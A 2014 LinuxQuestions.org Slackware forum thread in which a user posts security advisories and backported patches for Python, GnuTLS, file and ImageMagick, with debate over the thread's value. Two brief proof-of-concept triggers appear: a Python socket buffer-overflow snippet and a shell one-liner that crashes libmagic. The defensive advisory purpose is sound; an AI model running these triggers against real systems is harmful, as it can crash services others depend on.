LinuxQuestions.org
Share your knowledge at the LQ Wiki.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Distributions > Slackware
User Name
Password
Slackware This Forum is for the discussion of Slackware Linux.

Notices


Reply
  Search this Thread
Old 02-12-2014, 05:43 AM   #76
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled

As a die-hard pragmatist, my take on the kernel vulnerability is very simple: root exploit bad; fix easy.

It perplexes me when people focus on excuses; Solutions are so much better.

--mancha
 
4 members found this post helpful.
Old 02-12-2014, 05:43 AM   #77
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
As a die-hard pragmatist, my take on the kernel vulnerability is very simple: root exploit bad; fix easy.

It perplexes me when people focus on excuses; Solutions are so much better.

--mancha
 
4 members found this post helpful.
Old 02-12-2014, 11:54 AM   #78
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
Update 20140212
  1. Python

    A buffer overflow (CVE-2014-1912) has been identified in Python with a fix planned for inclusion in 2.7.7. However, because
    I don't know how long before that release, I decided to backport upstream's fix to Python 2.7.5 (Slackware 14.1's version)
    and 2.7.6 (most recent 2.7.x release):

    python-2.7.5_CVE-2014-1912.diff (sig)
    python-2.7.6_CVE-2014-1912.diff (sig)

    The fellow who discovered the vulnerability says that while highly unlikely, theoretically it is remotely exploitable.
PoC
Code:
import socket
r, w = socket.socketpair()
w.send(b'X' * 1024)
r.recvfrom_into(bytearray(), 1024)
--mancha

Last edited by mancha; 02-12-2014 at 12:08 PM.
 
6 members found this post helpful.
Old 02-12-2014, 05:32 PM   #79
ivandi
Member
 
Registered: Jul 2009
Location: Québec, Canada
Distribution: CRUX, Debian
Posts: 528

Rep: Reputation: 866Reputation: 866Reputation: 866Reputation: 866Reputation: 866Reputation: 866Reputation: 866
I am not sure I understand the point of this thread.

Keeping up with all the security issues is actually much more time consuming then maintaining a distribution like Slackware. It's a full time job for a dedicated team. PV provides a basic security support for Slackware keeping eye for important flaws and patching them. It's enough for home or small business users. Anyone who has ever used Slackware in larger production environment knows that he/she is on his/her own.

So what's the point of flashing here all these CVEs.
 
1 members found this post helpful.
Old 02-12-2014, 05:40 PM   #80
jstg
Member
 
Registered: Apr 2006
Distribution: Slackware
Posts: 59

Rep: Reputation: 37
Quote:
Originally Posted by ivandi View Post
I am not sure I understand the point of this thread.

Keeping up with all the security issues is actually much more time consuming then maintaining a distribution like Slackware. It's a full time job for a dedicated team. PV provides a basic security support for Slackware keeping eye for important flaws and patching them. It's enough for home or small business users. Anyone who has ever used Slackware in larger production environment knows that he/she is on his/her own.

So what's the point of flashing here all these CVEs.
I've been looking at it as a way to alert other users of security risks so if they want to take their own action they can. mancha has been pretty good about pointing out the issues and then providing fixes for them. I'm happy mancha is taking the time to help out.
 
5 members found this post helpful.
Old 02-12-2014, 05:44 PM   #81
number22
Member
 
Registered: Sep 2006
Location: Earth
Distribution: Slackware 14.1 Slackware64-current multilib
Posts: 278
Blog Entries: 7

Rep: Reputation: Disabled
There is no need to sugar coating security flaws, don't need to question OP method of warning, I found this thread is very useful, at least, OP is trying be organized.
 
7 members found this post helpful.
Old 02-12-2014, 07:22 PM   #82
ivandi
Member
 
Registered: Jul 2009
Location: Québec, Canada
Distribution: CRUX, Debian
Posts: 528

Rep: Reputation: 866Reputation: 866Reputation: 866Reputation: 866Reputation: 866Reputation: 866Reputation: 866
IMHO Slackware-security mailing list is much more organized and is the right method of reporting security issues and proposing patches.

Actually downloading unofficial "security" patches from forum posts is the worst practice I can imagine.

No offense to the OP but this sounds like an attempt to point out the obvious fact that PV cant keep up with ALL the security issues of Slackware. As I said above its mission impossible for a single maintainer. Slackware is what it is - one man show. There is no point of complaining about the time it takes to fix some vulnerability. Even a root exploit. As a Slackware user you are on your own. Take it or leave it.
 
Old 02-12-2014, 08:02 PM   #83
chessmaster15
LQ Newbie
 
Registered: Aug 2011
Location: Delaware
Distribution: FreeBSD,OpenBSD,Slackware
Posts: 21

Rep: Reputation: Disabled
I found emailing the security team takes care of problems Fast. I remembered I sent a email a while back about a issue and it was corrected a couple of hours latter.
 
Old 02-12-2014, 09:02 PM   #84
metaschima
Senior Member
 
Registered: Dec 2013
Distribution: Slackware
Posts: 1,982

Rep: Reputation: 492Reputation: 492Reputation: 492Reputation: 492Reputation: 492
Quote:
Originally Posted by chessmaster15 View Post
I found emailing the security team takes care of problems Fast. I remembered I sent a email a while back about a issue and it was corrected a couple of hours latter.
It would be nice if mancha told us if he actually e-mails these to Pat V. or not.
 
Old 02-13-2014, 11:01 AM   #85
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
Quote:
Originally Posted by ivandi View Post
I am not sure I understand the point of this thread...So what's the point of flashing here all these CVEs.
To contribute to Slackware by providing security-related alerts and making fixes for identified vulnerabilities available to Pat and fellow slackers.

In addition, the thread provides a space where slackers can discuss technical aspects of discovered security issues.

--mancha

Last edited by mancha; 02-18-2014 at 02:13 AM. Reason: Made answer direct and to the point.
 
11 members found this post helpful.
Old 02-14-2014, 02:12 AM   #86
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
Update 20140214
  1. GnuTLS

    It was discovered version 1 intermediate certificates were being incorrectly considered CA certificates by default since
    version 2.11.5. Systems with CAs in their trusted root certificate store, which issue X.509 version 1 certificates, are
    potentially vulnerable. [CVE-2014-1959 / GNUTLS-SA-2014-1]

    Solution: Upgrade to GnuTLS 3.1.21 or apply this fix.
--mancha

Last edited by mancha; 02-14-2014 at 11:14 PM. Reason: Update version where flaw was introduced.
 
1 members found this post helpful.
Old 02-18-2014, 02:19 AM   #87
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
Update 20140218
  1. file

    A flaw (CVE-2014-1943) was discovered in the handling of indirect magic rules in the libmagic library where malicious
    input can trigger an infinite recursion and cause a DoS (segmentation fault) or, theoretically, arbitrary code execution.

    PoC:
    Code:
    $ echo -n "4552000000" | xxd -r -p | file -
    Solution: Upgrade to file 5.17 or apply my backport fix (sig) to file 5.14.

--mancha

Last edited by mancha; 02-18-2014 at 12:50 PM.
 
Old 02-21-2014, 11:38 AM   #88
altor31
LQ Newbie
 
Registered: May 2010
Distribution: Slackware
Posts: 16

Rep: Reputation: 5
Update 20140221

Quote:
Adobe has released security updates for Adobe Flash Player 12.0.0.44 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.336 and earlier versions for Linux. These updates address vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe is aware of reports that an exploit for CVE-2014-0502 exists in the wild, and recommends users update their product installations to the latest versions:

Users of Adobe Flash Player 11.2.202.336 and earlier versions for Linux should update to Adobe Flash Player 11.2.202.341.

More information on http://helpx.adobe.com/security/prod...apsb14-07.html
I personally use the slackbuilds from SBo and just download the last version of Flash here https://fpdownload.macromedia.com/ge....x86_64.tar.gz

I'm pretty sure that we could do the same with the flashplayer in /extra
 
2 members found this post helpful.
Old 02-21-2014, 06:54 PM   #89
metaschima
Senior Member
 
Registered: Dec 2013
Distribution: Slackware
Posts: 1,982

Rep: Reputation: 492Reputation: 492Reputation: 492Reputation: 492Reputation: 492
The kernel vulnerability has been fixed. The new kernel has '# CONFIG_X86_X32 is not set', which is the simplest solution.
 
Old 02-22-2014, 04:44 PM   #90
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
Update 20140222
  1. ImageMagick

    Two vulnerabilities have been identified in the way ImageMagick handles PSD images: 1) a boundary error during RLE decoding
    (CVE-2014-1958), and 2) a buffer overrun when writing PSD images (CVE-2014-2030).

    Solution: Rebuild ImageMagick 6.8.6-10 after applying my backport fix.

    Note: I combined both fixes into a single patch because they're both in the Photoshop image processing code-base.
--mancha
 
Old 03-04-2014, 04:37 PM   #91
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled

Update 20140304
  1. GnuTLS

    A security audit of GnuTLS, carried out by one of its primary developers, has identified serious flaws in its certificate validation
    code (CVE-2014-0092). The vulnerabilities can be exploited via specially-crafted certificates to effectively circumvent certificate
    validation checks.

    Solution: Slackware deployed security fixes for Slackware 13.0 through current the day the issue became public (20140303).
    I encourage those who've not yet applied these updates to do so as soon as possible.

    Note: Slackware 12.1 and 12.2 systems can address this issue by rebuilding GnuTLS after applying Slackware 13.0's fix.
--mancha

Last edited by mancha; 03-04-2014 at 11:26 PM. Reason: add audit attribution
 
1 members found this post helpful.
  


Reply

Tags
exploit, security, slackware


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
[Slackware Security]: Some pending vulnerabilities... mancha Slackware 7 08-22-2013 09:08 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Distributions > Slackware

All times are GMT -5. The time now is 04:58 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration